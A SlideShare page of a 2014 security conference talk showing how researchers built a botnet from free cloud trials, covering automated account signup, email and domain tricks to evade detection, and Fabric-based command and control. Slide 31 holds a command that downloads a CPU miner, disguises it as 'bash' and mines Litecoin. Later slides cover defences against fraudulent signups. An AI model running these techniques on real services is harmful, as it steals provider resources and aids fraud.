CloudBots:
Harvesting Crypto Coins
Like a Botnet Farmer
2014 August 6
2
…and Violating Terms of Service
Building a Botnet with Free Cloud-based Services
3
Main Topics
•  Could we build a botnet from freely available cloud
services?
•  Will we see the rise of more cloud based...
4
Platform as a Service
Cloud PaaS
5
Platform as a Service
Free Cloud Services
<Insert	
  with	
  other	
  providers	
  later>	
  
Reference: http://goo.gl/A...
6
Development Environment as a Service
Free Cloud Services
AUTOMATION
Scripting the Cloud
8
Automating Registration
•  Hurdles
-  Email address confirmation
-  CAPTCHA
-  Phone/SMS
-  Credit Card
Usability vs Sec...
9
Anti-Automation
Fraudulent Account Registration
More Anti-Automation
Email Confirmation Only
66%
33%
EMAIL CAPTCHA CREDI...
10
Anti-Automation Techniques
•  Email address confirmation
•  CAPTCHA
•  Phone/SMS
•  Credit Card
Usability vs Security
C...
11
12
Automated email
processing
-  Wildcard localpart
*@domain.com
-  Extract important information
from incoming emails
-  ...
local-part@domain.tld
Email Address Anatomy
14
Using the Google AppEngine InboundMailHandler
- first.last.001@cloudbotmail.appspotmail.com
- first.last.002@cloudbotma...
15
Unlimited usernames
-  Prevent pattern recognition
-  Pull from real world examples
[local-part from dump]@domain.tld
R...
16
Unlimited domains
-  freedns.afraid.org
-  Prevent detection
-  Thousands of unique email
domains
SMTP Services
Plethor...
17
Unlimited email addresses
Free DNS Subdomains
18
What do we need?
•  Free email relay
-  Free MX registration
•  Process wildcards
-  *@domain.tld
•  Send unlimited mes...
19
Inbound Mail As A Service
Free Cloud Services
<Insert	
  with	
  other	
  providers	
  later>	
  
Reference: http://goo...
20
Automated email
processing
-  Extract important information
from incoming emails
-  Grep for confirmation token
links a...
21
<Insert wall of
random email
addresses>
Realistic Randomness
Unique Email Addresses
Avoid Pattern Recognition
DEMONSTRATION
Automatic Account Creation
23
Automated Registration Workflow
Email Addresses
24
MongoDB
•  MongoLab
•  MongoHQ
Keeping track of all accounts
Storing Account Information
FUNTIVITIES
Botnets Are Fun!
26
What can we do?
•  Distributed Network Scanning
•  Distributed Password Cracking
•  DDoS
•  Click-fraud
•  Crypto Curre...
27
Refer Fake Friends
Unlimited Storage Space
28
Refer Fake Friends
Unlimited Storage Space
29
What are we using?
•  Fabric
-  Fabric is a Python library and command-
line tool for streamlining the use of SSH for
a...
30
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com
4.109.182.13
[eu1.clo...
31
Make money, money
•  Deploying miners
•  One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ...
32
Load After Crypto Currency Mining
Distributed Command
ID | Host | Status
----------------------------------------
0 | n...
33
All your processors are belong to us
Litecoin Mining
CLOUD BREAKOUT
Bypassing Restrictions
DETECTION
No one can catch a ninja!
36
Automatic Backups
•  Propagate to other similar services
-  e.g. MongoLab ß à MongoHQ
•  Infrastructure across multip...
RISING TREAD
Active Attacks
38
Adaptation
Cloud Provider Registration
39
Adaptation
Cloud Provider Registration
40
Adaptation
Cloud Provider Registration
41
Crypto Coins & DDoS
Clouds Under Siege
42
Crypto Coins & DDoS
Clouds Under Siege
PROTECTION
Bot Busters
44
What can we do?
•  Logic puzzles
•  Sound output
•  Credit card validation
•  Live operators
•  Limited-use account
•  ...
45
What should we do?
•  Analyzing properties of Sybil
accounts
•  Analyzing the arrival rate and
distribution of accounts...
46
At Abuse vs At Registration
Protection
Advanced techniques
•  Signup flow events
-  Detect common activities after sign...
THANK YOU
Oscar Salazar @tracertea
Rob Ragan @sweepthatleg
CONTACT@BISHOPFOX.COM
Upcoming SlideShare
Loading in...5
×

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

1,738

Published on

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service.

We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares!

While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,738
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
43
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  1. 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  2. 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  3. 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  4. 4. 4 Platform as a Service Cloud PaaS
  5. 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  6. 6. 6 Development Environment as a Service Free Cloud Services
  7. 7. AUTOMATION Scripting the Cloud
  8. 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  9. 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  10. 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  11. 11. 11
  12. 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  13. 13. local-part@domain.tld Email Address Anatomy
  14. 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  15. 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  16. 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  17. 17. 17 Unlimited email addresses Free DNS Subdomains
  18. 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  19. 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  20. 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  21. 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  22. 22. DEMONSTRATION Automatic Account Creation
  23. 23. 23 Automated Registration Workflow Email Addresses
  24. 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  25. 25. FUNTIVITIES Botnets Are Fun!
  26. 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  27. 27. 27 Refer Fake Friends Unlimited Storage Space
  28. 28. 28 Refer Fake Friends Unlimited Storage Space
  29. 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  30. 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  31. 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  32. 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  33. 33. 33 All your processors are belong to us Litecoin Mining
  34. 34. CLOUD BREAKOUT Bypassing Restrictions
  35. 35. DETECTION No one can catch a ninja!
  36. 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  37. 37. RISING TREAD Active Attacks
  38. 38. 38 Adaptation Cloud Provider Registration
  39. 39. 39 Adaptation Cloud Provider Registration
  40. 40. 40 Adaptation Cloud Provider Registration
  41. 41. 41 Crypto Coins & DDoS Clouds Under Siege
  42. 42. 42 Crypto Coins & DDoS Clouds Under Siege
  43. 43. PROTECTION Bot Busters
  44. 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  45. 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  46. 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  47. 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×